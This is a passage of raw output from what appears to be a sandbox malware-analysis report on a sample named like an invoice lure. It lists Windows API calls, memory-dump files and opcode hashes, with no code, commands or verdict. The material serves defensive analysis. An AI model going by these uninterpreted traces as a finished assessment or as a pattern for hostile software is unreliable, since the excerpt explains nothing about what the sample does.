                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                          • String ID:
                                                          • API String ID: 3495660284-0
                                                          • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                          • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                          • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                          • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                          APIs
                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Virtual
                                                          • String ID:
                                                          • API String ID: 4278518827-0
                                                          • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                          • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                          • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                          • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                          APIs
                                                          • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                            • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                          • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                            • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                          • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                          • ExitThread.KERNEL32 ref: 004151ED
                                                          • __freefls@4.LIBCMT ref: 00415209
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                          • String ID:
                                                          • API String ID: 442100245-0
                                                          • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                          • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                          • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                          • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                          APIs
                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                          • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                          • _wcslen.LIBCMT ref: 0045F94A
                                                          • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                          • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                          • String ID: 0
                                                          • API String ID: 621800784-4108050209
                                                          • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                          • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                          • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                          • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                          APIs
                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                          • SetErrorMode.KERNEL32 ref: 004781CE
                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                          • SetErrorMode.KERNEL32(?), ref: 00478270
                                                          • SetErrorMode.KERNEL32(?), ref: 00478340
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                          • String ID: \VH
                                                          • API String ID: 3884216118-234962358
                                                          • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                          • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                          • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                          • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                          APIs
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                          • IsMenu.USER32(?), ref: 0044854D
                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                          • DrawMenuBar.USER32 ref: 004485AF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$DrawInfoInsert
                                                          • String ID: 0
                                                          • API String ID: 3076010158-4108050209
                                                          • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                          • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                          • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                          • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                          APIs
                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                          • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$_memmove_wcslen
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 1589278365-1403004172
                                                          • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                          • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                          • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                          • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Handle
                                                          • String ID: nul
                                                          • API String ID: 2519475695-2873401336
                                                          • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                          • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                          • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                          • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Handle
                                                          • String ID: nul
                                                          • API String ID: 2519475695-2873401336
                                                          • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                          • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                          • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                          • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: SysAnimate32
                                                          • API String ID: 0-1011021900
                                                          • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                          • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                          • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                          • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                          APIs
                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                            • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                            • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                            • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                            • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                          • GetFocus.USER32 ref: 0046157B
                                                            • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                            • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                          • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                          • __swprintf.LIBCMT ref: 00461608
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                          • String ID: %s%d
                                                          • API String ID: 2645982514-1110647743
                                                          • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                          • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                          • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                          • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                          • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                          • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                          • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                          APIs
                                                          • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                          • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseCountersCurrentHandleOpen
                                                          • String ID:
                                                          • API String ID: 3488606520-0
                                                          • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                          • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                          • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                          • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                          APIs
                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ConnectRegistry_memmove_wcslen
                                                          • String ID:
                                                          • API String ID: 15295421-0
                                                          • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                          • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                          • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                          • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                          APIs
                                                          • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                          • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                          • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
